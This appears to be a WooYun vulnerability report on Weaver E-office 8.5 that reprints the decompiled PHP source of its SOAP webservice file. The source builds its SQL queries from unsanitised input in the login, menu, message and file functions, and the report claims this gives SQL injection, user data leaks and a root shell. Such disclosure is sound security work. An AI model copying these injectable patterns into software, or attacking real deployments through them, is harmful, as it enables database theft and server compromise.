2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向第三方安全合作伙伴开放 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)
看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码webservice/eoffice.wsdl.php:看看里面的代码:
<?php/*********************//* *//* Dezend for PHP5 *//* NWS *//* Nulled.WS *//* *//*********************/function UserLogin( $userAccount, $password ){ global $connection; global $_lang; if ( trim( $userAccount ) == "" ) { $userLoginReturn['code'] = "0x0000001"; return $userLoginReturn; } $checkUserAccountIsExsitQuery = "SELECT * FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'"; $checkUserAccountIsExsitResult = exequery( $connection, $checkUserAccountIsExsitQuery ); if ( $checkUserAccountIsExsitRow = mysql_fetch_array( $checkUserAccountIsExsitResult ) ) { if ( trim( $checkUserAccountIsExsitRow['USER_ACCOUNTS'] ) != trim( $userAccount ) ) { $userLoginReturn['code'] = "0x0000002"; return $userLoginReturn; } } else { $userLoginReturn['code'] = "0x0000002"; return $userLoginReturn; } $checkPasswordQuery = "SELECT PASSWORD FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'"; $checkPasswordResult = exequery( $connection, $checkPasswordQuery ); $checkPasswordRow = mysql_fetch_array( $checkPasswordResult ); $myPassword = $checkPasswordRow['PASSWORD']; if ( crypt( $password, $myPassword ) != $myPassword ) { $userLoginReturn['code'] = "0x0000003"; return $userLoginReturn; } $query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; $cursor = exequery( $connection, $query ); $ROW = mysql_fetch_array( $cursor ); $timenow = time( ); $CUR_TIME = date( "Y-m-d H:i:s", $timenow ); $query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'"; exequery( $connection, $query ); $query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV']; $cursor = exequery( $connection, $query ); if ( $ROW1 = mysql_fetch_array( $cursor ) ) { $LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR']; } $LOGIN_THEME = $ROW['THEME']; $template = $ROW['TEMPLATE']; if ( !$template ) { $template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 "; $template_rs = exequery( $connection, $template_query ); if ( $row_tp = mysql_fetch_array( $template_rs ) ) { $template = $row_tp['TEMPLATE_NAME']; } else { $template = "8series"; } } if ( $template == "8series" ) { $mainUrl = "/general/index8.php"; } else if ( $template == "7series" ) { $mainUrl = "/general/index.php"; } else { $mainUrl = "index8.php"; } if ( $LOGIN_THEME == "" ) { $LOGIN_THEME = "default"; } $LOGIN_THEME = $template."/".$LOGIN_THEME; session_start( ); $_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID']; $_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD']; $_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV']; $_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS']; $_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME']; $_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV']; $_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID']; $_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR; $_SESSION['LOGIN_THEME'] = $LOGIN_THEME; $_SESSION['LOGIN_LANG'] = "cn"; $_SESSION['LOGIN_LANG_ID'] = 1; $infor['sessionID'] = session_id( ); $infor['userID'] = $ROW['USER_ID']; $infor['deptID'] = $ROW['USER_ID']; $infor['privID'] = $ROW['USER_PRIV']; $infor['userName'] = $ROW['USER_NAME']; $infor['userAccount'] = $ROW['USER_ACCOUNTS']; $infor['avatarType'] = $ROW['AVATAR_TYPE']; $query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'"; exequery( $connection, $query ); add_log( 1, $_lang['common_login_from_PC'], $ROW['USER_ID'] ); $query = "SELECT * FROM `sys_para`;"; $result = exequery( $connection, $query ); while ( $row = mysql_fetch_array( $result ) ) { switch ( $row['PARA_NAME'] ) { case "slogan" : $infor['slogan'] = $row['PARA_VALUE']; break; case "SMS_FREQUENCY" : $infor['smsFrequency'] = $row['PARA_VALUE']; break; } } $query = "SELECT * FROM sys_upload WHERE MODULE_NAME='SMS' OR MODULE_NAME ='FILE'"; $result = exequery( $connection, $query ); while ( $row = mysql_fetch_array( $result ) ) { if ( $row['MODULE_NAME'] == "SMS" ) { $temp['maxNumber'] = $row['UPLOAD_MAX_NUM']; $temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE']; $temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE']; $temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE; $infor['smsUploadParam'] = $temp; } else if ( $row['MODULE_NAME'] == "FILE" ) { $temp['maxNumber'] = $row['UPLOAD_MAX_NUM']; $temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE']; $temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE']; $temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE; $infor['documentUploadParam'] = $temp; } } $userLoginReturn['code'] = "0x0000000"; $userLoginReturn['infor'] = $infor; return $userLoginReturn;}function GetLanguage( ){ global $connection; $query = "SELECT LANG_ID,LANG_NAME FROM language"; $result = exequery( $connection, $query ); $language = array( ); while ( $row = mysql_fetch_array( $result ) ) { $temp['langID'] = $row['LANG_ID']; $temp['langName'] = $row['LANG_NAME']; array_push( $language, $temp ); } return $language;}function GetMenuLink( $funcCode, $funcName ){ if ( trim( $funcCode ) == "" || trim( $funcCode ) == "@" ) { $href = ""; } else if ( strstr( $funcCode, "http://" ) || strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) ) { if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) ) { $funcCode = "/general/".$funcCode; } if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) ) { $href = "/general/workflow/flow_redirect.php?url=".urlencode( $funcCode )."&FUNC_ID={$func_id}"; } else { $href = $funcCode; } } else if ( strstr( $funcCode, "file://" ) ) { $winpath = str_replace( "\\", "/", str_replace( "file://", "", $funcCode ) ); $winpath = base64_encode( $winpath ); $href = "/general/winexe/run_cache.php?path=".$winpath."&name=".urlencode( $funcName ); } else if ( strstr( $funcCode, "*" ) ) { $func_code = str_replace( "*", "", $funcCode ); $href = "/general/loginothersys/run_login.php?id=".$func_code; } else { $needle = "?"; $tmparray = explode( $needle, $funcCode ); if ( 1 < count( $tmparray ) ) { $href = "/general/".$funcCode."&func_id={$func_id}"; } else { $href = "/general/".$funcCode."?func_id={$func_id}"; } } return $href;}function GetUserFuncIDStr( $userPriv ){ global $connection; $query = "SELECT FUNC_ID_STR from USER_PRIV where USER_PRIV='".$userPriv."'"; $result = exequery( $connection, $query ); $row = mysql_fetch_array( $result ); return substr( $row['FUNC_ID_STR'], 0, -1 );}function GetCommonMenu( $userPriv, $userID, $langID ){ global $connection; $funcIDStr = getuserfuncidstr( $userPriv ); $funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr; $query = "SELECT \r\n\t\t\t\ta.FUNC_NAME AS FUNC_NAME_SYS,\r\n\t\t\t\ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,\r\n\t\t\t\ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,\r\n\t\t\t\tb.FUNC_ID,\r\n\t\t\t\tb.FUNC_NAME AS FUNC_NAME_USER,\r\n\t\t\t\tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,\r\n\t\t\t\tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,\r\n\t\t\t\tb.FUNC_CODE,\r\n\t\t\t\tb.FUNC_ISSYS,\r\n\t\t\t\tc.FUNC_IMG \r\n\t\t\t\tFROM menu_lang AS a \r\n\t\t\t\tJOIN user_menu AS b \r\n\t\t\t\tON a.FUNC_ID = b.FUNC_ID \r\n\t\t\t\tJOIN sys_function AS c \r\n\t\t\t\tON a.FUNC_ID = c.FUNC_ID \r\n\t\t\t\tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID." ) \r\n\t\t\t\tOR b.FUNC_ISSYS=0) \r\n\t\t\t\tAND LEFT(b.FUNC_CODE,1)<>'@' \r\n\t\t\t\tAND b.FUNC_CODE <> '' \r\n\t\t\t\tAND b.USER_ID = '".$userID."' \r\n\t\t\t\tAND b.FUNC_ISSHOW = 1 \r\n\t\t\t\tORDER BY FREQUENCY DESC \r\n\t\t\t\tLIMIT 0,12"; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { if ( $row['FUNC_ISSYS'] == 1 ) { $funcName = $row['FUNC_NAME_SYS']; } else { $funcName = $row['FUNC_NAME_USER']; } $funcID = $row['FUNC_ID']; $menuID = $row['MENU_ID']; $funcCode = $row['FUNC_CODE']; $funcImg = $row['FUNC_IMG']; if ( $funcImg == "" ) { $imgSrc = "/images/8/icons/48/".$funcID.".png"; } else { $imgSrc = "/attachment/index/48/".$funcImg; } $imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/48/default.png"; $tempArray['funcName'] = $funcName; $tempArray['funcID'] = $funcID; $tempArray['imageLink'] = $imgSrc; $tempArray['menuLink'] = getmenulink( $funcCode, $funcName ); array_push( $returnArray, $tempArray ); } return $returnArray;}function IsHaveChildrenMenu( $userID, $menuID, $funcIDStr ){ global $connection; $menuLength = strlen( $menuID ); $query = "SELECT COUNT(*) AS CNT FROM user_menu \r\n\t\t\t WHERE LEFT(MENU_ID,".$menuLength.")='".$menuID."' \r\n\t\t\t AND LENGTH(MENU_ID)=".( strlen( $menuID ) + 2 )." \r\n\t\t\t AND USER_ID='".$userID."' \r\n\t\t\t AND FUNC_ID IN ({$funcIDStr})\r\n\t\t\t AND FUNC_ISSHOW = 1"; $result = exequery( $connection, $query ); if ( $row = mysql_fetch_array( $result ) ) { if ( 0 < $row['CNT'] ) { return true; } else { return false; } }}function GetAllMenu( $userPriv, $userID, $langID ){ global $connection; $funcIDStr = getuserfuncidstr( $userPriv ); $funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr; $query = "SELECT \r\n\t\t\t\ta.FUNC_NAME AS FUNC_NAME_SYS,\r\n\t\t\t\ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,\r\n\t\t\t\ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,\r\n\t\t\t\tb.FUNC_ID,\r\n\t\t\t\tb.FUNC_NAME AS FUNC_NAME_USER,\r\n\t\t\t\tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,\r\n\t\t\t\tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,\r\n\t\t\t\tb.FUNC_CODE,\r\n\t\t\t\tb.FUNC_ISSYS,\r\n\t\t\t\tb.MENU_ID,\r\n\t\t\t\tc.FUNC_IMG \r\n\t\t\t\tFROM menu_lang AS a \r\n\t\t\t\tRIGHT JOIN user_menu AS b \r\n\t\t\t\tON a.FUNC_ID = b.FUNC_ID \r\n\t\t\t\tLEFT JOIN sys_function AS c \r\n\t\t\t\tON a.FUNC_ID = c.FUNC_ID \r\n\t\t\t\tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID.") \r\n\t\t\t\tOR b.FUNC_ISSYS=0) \r\n\t\t\t\tAND b.USER_ID = '".$userID."' \r\n\t\t\t\tAND b.FUNC_ISSHOW = 1 ORDER BY b.ORDER_ID ASC"; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { if ( $row['FUNC_ISSYS'] == 1 ) { $funcName = $row['FUNC_NAME_SYS']; $funcNamePY = $row['FUNC_NAME_PY_SYS']; $funcNameZM = $row['FUNC_NAME_ZM_SYS']; } else { $funcName = $row['FUNC_NAME_USER']; $funcNamePY = $row['FUNC_NAME_PY_USER']; $funcNameZM = $row['FUNC_NAME_ZM_USER']; } $funcID = $row['FUNC_ID']; $menuID = $row['MENU_ID']; $funcCode = $row['FUNC_CODE']; $funcImg = $row['FUNC_IMG']; $menuIDLength = strlen( $menuID ); if ( $funcCode == "" || strstr( $funcCode, "@" ) !== false ) { $isParent = "true"; } else { $isParent = "false"; } if ( $isParent == "true" && !ishavechildrenmenu( $userID, $menuID, $funcIDStr ) ) { continue; } if ( $funcImg == "" ) { $imgSrc = "/images/8/icons/16/".$funcID.".png"; } else { $imgSrc = "/attachment/index/16/".$funcImg; } $imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/16/default.png"; $tempArray['isParent'] = $isParent; $tempArray['funcName'] = $funcName; $tempArray['funcNamePY'] = $funcNamePY; $tempArray['funcNameZM'] = $funcNameZM; $tempArray['funcID'] = $funcID; $tempArray['imageLink'] = $imgSrc; $tempArray['menuID'] = $menuID; $tempArray['menuLink'] = getmenulink( $funcCode, $funcName ); array_push( $returnArray, $tempArray ); } return $returnArray;}function GetMenuByUserID( $userID ){ global $connection; $query = "SELECT b.FUNC_ID_STR FROM user as a JOIN user_priv as b ON a.USER_PRIV=b.USER_PRIV WHERE a.USER_ID='".$userID."'"; $result = exequery( $connection, $query ); if ( $row = mysql_fetch_array( $result ) ) { return $row['FUNC_ID_STR']; }}function GetUser( ){ global $connection; $query = "SELECT a.*,b.DEPT_NAME,c.PRIV_NAME \r\n\t\t\t\tFROM user as a \r\n\t\t\t\tJOIN department as b \r\n\t\t\t\tON a.DEPT_ID = b.DEPT_ID \r\n\t\t\t\tJOIN user_priv as c \r\n\t\t\t\tON a.USER_PRIV = c.USER_PRIV \r\n\t\t\t\tWHERE a.DEPT_ID!=0 \r\n\t\t\t\tORDER BY a.LISTNUMBER,a.USER_NAME"; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { $tempArray['deptID'] = $row['DEPT_ID']; $tempArray['userID'] = $row['USER_ID']; $tempArray['userName'] = $row['USER_NAME']; $tempArray['userPriv'] = $row['USER_PRIV']; $tempArray['avatarType'] = $row['AVATAR_TYPE']; $tempArray['department'] = $row['DEPT_NAME']; $tempArray['userPrivName'] = $row['PRIV_NAME']; $tempArray['email'] = $row['EMAIL']; $tempArray['phoneNumber'] = $row['MOBIL_NO']; $tempArray['birthday'] = $row['BIRTHDAY']; $tempArray['userNamePY'] = $row['USER_NAME_PY']; $tempArray['userNameZM'] = $row['USER_NAME_ZM']; array_push( $returnArray, $tempArray ); } return $returnArray;}function GetDept( ){ global $connection; $query = "SELECT DEPT_ID,DEPT_NAME,DEPT_PARENT FROM department ORDER BY DEPT_NO ASC"; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { $tempArray['deptID'] = $row['DEPT_ID']; $tempArray['deptName'] = $row['DEPT_NAME']; $tempArray['deptParent'] = $row['DEPT_PARENT']; array_push( $returnArray, $tempArray ); } return $returnArray;}function GetPriv( ){ global $connection; $query = "SELECT USER_PRIV,PRIV_NAME FROM user_priv ORDER BY PRIV_NO"; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { $tempArray['privID'] = $row['USER_PRIV']; $tempArray['privName'] = $row['PRIV_NAME']; array_push( $returnArray, $tempArray ); } return $returnArray;}function SendMessage( $fromUserID, $toUserID, $content, $attachmentID, $attachmentName ){ global $connection; $query = "INSERT INTO sms \r\n\t\t\t(FROM_ID,TO_ID,SMS_TYPE,CONTENT,SEND_TIME,REMIND_FLAG,ATTACHMENT_ID,ATTACHMENT_NAME)\r\n\t\t\tVALUES \r\n\t\t\t('".$fromUserID."','".$toUserID."',0,'".$content."',NOW(),1,'".$attachmentID."','".$attachmentName."')"; return exequery( $connection, $query );}function GetMessage( $userID, $isOnlyNew ){ global $connection; $CUR_TIME = date( "Y-m-d H:i:s", time( ) ); $query = "SELECT * FROM sms \r\n\t\t\t\t\tWHERE TO_ID='".$userID."' \r\n\t\t\t\t\tAND receive_del = 0 \r\n\t\t\t\t\tAND send_del !=1 \r\n\t\t\t\t\tAND SEND_TIME<='{$CUR_TIME}'"; $limit = " LIMIT 0,30"; if ( $isOnlyNew ) { $query .= " AND REMIND_FLAG=1"; $limit = ""; } $query .= " ORDER BY SEND_TIME DESC ".$limit; $result = exequery( $connection, $query ); $returnArray = array( ); while ( $row = mysql_fetch_array( $result ) ) { $tempArray['smsID'] = $row['SMS_ID']; $tempArray['smsType'] = $row['SMS_TYPE']; $tempArray['attachmentID'] = $row['ATTACHMENT_ID']; $tempArray['attachmentName'] = $row['ATTACHMENT_NAME']; $tempArray['fromUserID'] = $row['FROM_ID']; $tempArray['fromUserName'] = getusernamenew( $row['FROM_ID'] ); $tempArray['fromUserAvatar'] = getuseravatartype( $row['FROM_ID'] ); $tempArray['content'] = $row['CONTENT']; $tempArray['sendTime'] = $row['SEND_TIME']; $typeArray = getsmstypeurl( $row['SMS_TYPE'], $row['CONTENT'], $row['TABLE_ID'], $row['TABLE_VAR'], $row['TABLE_NAME'], $userID ); $tempArray['typeText'] = $typeArray['TEXT']; $tempArray['typeUrl'] = $typeArray['URL']; array_push( $returnArray, $tempArray ); } return $returnArray;}function SetMessageRead( $userID, $messageIDStr, $fromUserID ){ global $connection; $CUR_TIME = date( "Y-m-d H:i:s", time( ) ); $query = "UPDATE `sms`\r\n\t\t\t\tSET `REMIND_FLAG` = 0 WHERE SEND_TIME<='{$CUR_TIME}' AND TO_ID='".$userID."'"; if ( $fromUserID != "" ) { $query .= " AND FROM_ID='".$fromUserID."'"; } if ( $messageIDStr != "" ) { $query .= " AND SMS_ID IN ({$messageIDStr})"; } exequery( $connection, $query );}function CreateFile( $subject, $attachmentIDStr, $attachmentNameStr, $userID ){ global $connection; $currentTime = date( "Y-m-d H:i:s", time( ) ); $query = "INSERT INTO `file_content`\r\n\t\t\t\t(\r\n\t\t\t\t`CONTENT_TYPE`,\r\n\t\t\t\t`SORT_ID`,\r\n\t\t\t\t`FROM_ID`,\r\n\t\t\t\t`SUBJECT`,\r\n\t\t\t\t`SEND_TIME`,\r\n\t\t\t\t`USER_ID`,\r\n\t\t\t\t`ATTACHMENT_ID`,\r\n\t\t\t\t`ATTACHMENT_NAME`,\r\n\t\t\t\t`FILE_TYPE`)\r\n\t\t\t\tVALUES\r\n\t\t\t\t(\r\n\t\t\t\t1,\r\n\t\t\t\t-1,\r\n\t\t\t\t0,\r\n\t\t\t\t'".$subject."',\r\n\t\t\t\t'".$currentTime."',\r\n\t\t\t\t'".$userID."',\r\n\t\t\t\t'".$attachmentIDStr."',\r\n\t\t\t\t'".$attachmentNameStr."',\r\n\t\t\t\t1);"; exequery( $connection, $query ); return mysql_insert_id( );}function GetNewVersion( ){ global $connection; $getVersionQuery = "SELECT * FROM `client_version` ORDER BY DATE_TIME DESC LIMIT 0,1"; $getVersionResult = exequery( $connection, $getVersionQuery ); if ( $getVersionRow = mysql_fetch_array( $getVersionResult ) ) { $return['version'] = $getVersionRow['VERSION']; $getReadmeQuery = "SELECT * FROM `client_version_readme` WHERE CLIENT_VERSION_ID=".$getVersionRow['CLIENT_VERSION_ID']; $getReadmeResult = exequery( $connection, $getReadmeQuery ); while ( $getReadmeRow = mysql_fetch_array( $getReadmeResult ) ) { $temp['subject'] = $getReadmeRow['README_SUBJECT']; $temp['describe'] = $getReadmeRow['README_DESCRIBE']; $temp['image'] = $getReadmeRow['README_IMAGE']; if ( !is_array( $return['readme'] ) ) { $return['readme'] = array( ); } array_push( $return['readme'], $temp ); } } return $return;}function Attend( $userID, $deptID, $privID, $checkType ){ $userInfor['UserId'] = $userID; $userInfor['DepyId'] = $deptID; $userInfor['PrivId'] = $privID; $userInfor['LoginCheck'] = $checkType; $attend = new attend( ); $result = $attend->GetLoginInOut( $userInfor ); if ( $checkType == "in" ) { return $result['LoginInLateTime']; } else { return $result['LoginOutEarlyTime']; }}function CheckIsSignIn( $userID ){ $attend = new attend( ); $dutyId = $attend->getUserDutyType( $userID ); $dutyArray = $attend->getDutyData( $dutyId ); return $attend->isSignIn( $dutyArray, $dutyId, $userID );}include_once( "nusoap/lib/nusoap.php" );include_once( "inc/conn.php" );include_once( "api/user.class.php" );include_once( "api/attend.class.php" );include_once( "inc/utility_all.php" );include_once( "general/workflow/prcs_role.php" );include_once( "lang/cn/common.lang.php" );$server = new soap_server( );$server->soap_defencoding = "UTF-8";$server->decode_utf8 = false;$server->configureWSDL( "EofficeService", "urn:EofficeService" );$server->wsdl->schemaTargetNamespace = "urn:EofficeService";$server->wsdl->addComplexType( "UserLoginReturn", "complexType", "struct", "all", "", array( "code" => array( "name" => "code", "type" => "xsd:string" ), "infor" => array( "name" => "infor", "type" => "tns:userInforObj" ) ) );$server->wsdl->addComplexType( "userInforObj", "complexType", "struct", "all", "", array( "sessionID" => array( "name" => "sessionID", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "privID" => array( "name" => "privID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "userAccount" => array( "name" => "userAccount", "type" => "xsd:string" ), "avatarType" => array( "name" => "userAvatar", "type" => "xsd:string" ), "slogan" => array( "name" => "slogan", "type" => "xsd:string" ), "smsFrequency" => array( "name" => "smsFrequency", "type" => "xsd:string" ), "smsUploadParam" => array( "name" => "smsUploadParam", "type" => "tns:smsUploadParam" ), "documentUploadParam" => array( "name" => "documentUploadParam", "type" => "tns:documentUploadParam" ) ) );$server->wsdl->addComplexType( "smsUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );$server->wsdl->addComplexType( "documentUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );$server->register( "UserLogin", array( "userAccount" => "xsd:string", "password" => "xsd:string" ), array( "return" => "tns:UserLoginReturn" ), "urn:EofficeService", "urn:EofficeService#UserLogin", "rpc", "encoded", "UserLogin" );$server->wsdl->addComplexType( "languageRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:languageReturn[]" ) ), "tns:languageReturn" );$server->wsdl->addComplexType( "languageReturn", "complexType", "struct", "all", "", array( "langID" => array( "name" => "langID", "type" => "xsd:string" ), "langName" => array( "name" => "langName", "type" => "xsd:string" ) ) );$server->register( "GetLanguage", array( ), array( "return" => "tns:languageRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetLanguage", "rpc", "encoded", "GetLanguage" );$server->wsdl->addComplexType( "menuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:menuReturn[]" ) ), "tns:menuReturn" );$server->wsdl->addComplexType( "menuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );$server->register( "GetCommonMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:menuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetCommonMenu", "rpc", "encoded", "GetCommonMenu" );$server->wsdl->addComplexType( "allMenuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:allMenuReturn[]" ) ), "tns:allMenuReturn" );$server->wsdl->addComplexType( "allMenuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcNamePY" => array( "name" => "funcNamePY", "type" => "xsd:string" ), "funcNameZM" => array( "name" => "funcNameZM", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "menuID" => array( "name" => "menuID", "type" => "xsd:string" ), "isParent" => array( "name" => "isParent", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );$server->register( "GetAllMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:allMenuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetAllMenu", "rpc", "encoded", "Get All Menu" );$server->register( "GetMenuByUserID", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#GetMenuByUserID", "rpc", "encoded", "GetMenuByUserID" );$server->wsdl->addComplexType( "userReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:userReturn[]" ) ), "tns:userReturn" );$server->wsdl->addComplexType( "userReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "userPriv" => array( "name" => "userPriv", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "avatarType" => array( "name" => "avatarType", "type" => "xsd:string" ), "department" => array( "name" => "department", "type" => "xsd:string" ), "userPrivName" => array( "name" => "userPrivName", "type" => "xsd:string" ), "email" => array( "name" => "email", "type" => "xsd:string" ), "phoneNumber" => array( "name" => "phoneNumber", "type" => "xsd:string" ), "birthday" => array( "name" => "birthday", "type" => "xsd:string" ), "userNamePY" => array( "name" => "userNamePY", "type" => "xsd:string" ), "userNameZM" => array( "name" => "userNameZM", "type" => "xsd:string" ) ) );$server->register( "GetUser", array( ), array( "return" => "tns:userReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetUser", "rpc", "encoded", "Get User" );$server->wsdl->addComplexType( "deptReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:deptReturn[]" ) ), "tns:deptReturn" );$server->wsdl->addComplexType( "deptReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "deptName" => array( "name" => "deptName", "type" => "xsd:string" ), "deptParent" => array( "name" => "deptParent", "type" => "xsd:string" ) ) );$server->register( "GetDept", array( ), array( "return" => "tns:deptReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetDept", "rpc", "encoded", "Get Dept" );$server->wsdl->addComplexType( "privReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:privReturn[]" ) ), "tns:privReturn" );$server->wsdl->addComplexType( "privReturn", "complexType", "struct", "all", "", array( "privID" => array( "name" => "privID", "type" => "xsd:string" ), "privName" => array( "name" => "privName", "type" => "xsd:string" ) ) );$server->register( "GetPriv", array( ), array( "return" => "tns:privReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetPriv", "rpc", "encoded", "Get Priv" );$server->register( "SendMessage", array( "fromUserID" => "xsd:string", "toUserID" => "xsd:string", "content" => "xsd:string", "attachmentID" => "xsd:string", "attachmentName" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#SendMessage", "rpc", "encoded", "SendMessage" );$server->wsdl->addComplexType( "messageReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:messageReturn[]" ) ), "tns:messageReturn" );$server->wsdl->addComplexType( "messageReturn", "complexType", "struct", "all", "", array( "fromUserName" => array( "name" => "fromUserName", "type" => "xsd:string" ), "content" => array( "name" => "content", "type" => "xsd:string" ), "sendTime" => array( "name" => "sendTime", "type" => "xsd:string" ), "fromUserAvatar" => array( "name" => "fromUserAvatar", "type" => "xsd:string" ), "fromUserID" => array( "name" => "fromUserID", "type" => "xsd:string" ), "smsID" => array( "name" => "smsID", "type" => "xsd:string" ), "smsType" => array( "name" => "smsType", "type" => "xsd:string" ), "attachmentID" => array( "name" => "attachmentID", "type" => "xsd:string" ), "attachmentName" => array( "name" => "attachmentName", "type" => "xsd:string" ), "typeText" => array( "name" => "typeText", "type" => "xsd:string" ), "typeUrl" => array( "name" => "typeUrl", "type" => "xsd:string" ), "smsTypeName" => array( "name" => "smsTypeName", "type" => "xsd:string" ) ) );$server->register( "GetMessage", array( "userID" => "xsd:string", "isOnlyNew" => "xsd:boolean" ), array( "return" => "tns:messageReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetMessage", "rpc", "encoded", "GetMessage" 